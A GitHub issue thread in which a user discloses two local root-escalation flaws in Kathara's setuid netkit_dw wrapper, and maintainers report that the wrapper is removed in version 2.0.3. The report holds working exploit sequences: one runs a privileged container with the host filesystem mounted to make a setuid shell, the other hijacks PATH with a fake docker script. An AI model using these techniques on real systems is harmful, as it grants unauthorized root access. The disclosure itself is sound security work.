search

KatharaFramework / Kathara

A lightweight container-based network emulation system.
https://www.kathara.org/
GNU General Public License v3.0
430 stars 64 forks source link

Major Security Issue with Kathara install #59

Closed alexdu59 closed 4 years ago

alexdu59 commented 4 years ago

Hi,

Here are 2 local escalation vulnerabilities because netkit_dwis insecure and installed as setuid root.

Vuln 1: weak string comparisons in netkit_dw.c

Exploitation: 

alex@machine:~$ $KATHARAINSTALLDIR/bin/wrapper/bin/netkit_dw run \
--net=host \
 --ipc=host \
--uts=host \
--pid=host \
-i \
--security-opt=seccomp=unconfined \
--privileged \
--rm -v /:/host alpine /usr/sbin/chroot /host /bin/sh -c "echo 0 > /sys/class/net/br-XXXXXXXXXXXX/bridge/ageing_time; \
echo 65528 > /sys/class/net/br-XXXXXXXXXXXX/bridge/group_fwd_mask ; \
cp /bin/sh /tmp/s; chmod a+s /tmp/s"
/bin/sh: 1: cannot create /sys/class/net/br-XXXXXXXXXXXX/bridge/ageing_time: Directory nonexistent
/bin/sh: 1: cannot create /sys/class/net/br-XXXXXXXXXXXX/bridge/group_fwd_mask: Directory nonexistent
alex@machine:~$ /tmp/s -p
# whoami
root
#

Cause of this vulnerability : https://github.com/KatharaFramework/Kathara/blob/master/bin/wrapper/netkit_dw.c#L92 length does not check user supplied length (it can be greater, but still match the comparison).

Vuln 2: no environnement check in netkit_dw.c

The following command sequence allow you to get a root shell:

alex@machine:/tmp/exploit$ cat docker 
#!/bin/sh
sh
alex@machine:/tmp/exploit$ export PATH=.:$PATH 
alex@machine:/tmp/exploit$ [KATHARA INSTALL DIR]/bin/wrapper/bin/netkit_dw ls
# whoami
root
#

This is because: https://github.com/KatharaFramework/Kathara/blob/master/bin/wrapper/netkit_dw.c#L207, does not check environment (PATH variable). Any docker script in PATH will be executed as root.

Workaround

This vulnerable app should not be installed as setuid root (it's an open backdoor). User can use sudo or become root when in need for this.

Thank for the great tool

Alex - 15DgZkqe2Ee2MjAssJjVrN9WCf4LwZGquE

Kidel commented 4 years ago

Hi @alexdu59 thanks for your submission! Indeed those are 2 big oversights on my part. Thank you for pointing them out so that users are aware of them.

However this week the team will be launching the new version of Katharà that won't be using the wrapper at all.

As we're still dealing with docker, I'd be very happy if you could also take a look in the new version once it's publicly available. In the meantime keep pointing out security issues with the current version, since the new version is still somehow based on this one.

Kidel commented 4 years ago

I'm leaving the issue open until the new version is out, so that it's visible.

lorenzo93 commented 4 years ago

Hi @alexdu59 , we released now the new version of Kathará.

Both the vulnerabilities you figured out are now fixed. The wrapper is no longer existing and the python code will use the Docker API to launch containers.

The need of setuid is now replaced with setgid with the "docker" group. This is needed because this software needs to run on some shared computers where the user do not have sudo access to the system (University lab computers). If we let the student user to run sudo commands they could tamper with the system.

I'd be very happy if you could also take a look in the new version code to eventually find out new vulnerabilities.

gmelodie commented 4 years ago

@lorenzo93 Could you link me to the commits where the vulns have been solved?

Kidel commented 4 years ago

From version 2.0.3 (check the tags on master branch or the releases).

It's basically a complete rewrite from there, so linking a specific commit would be pointless.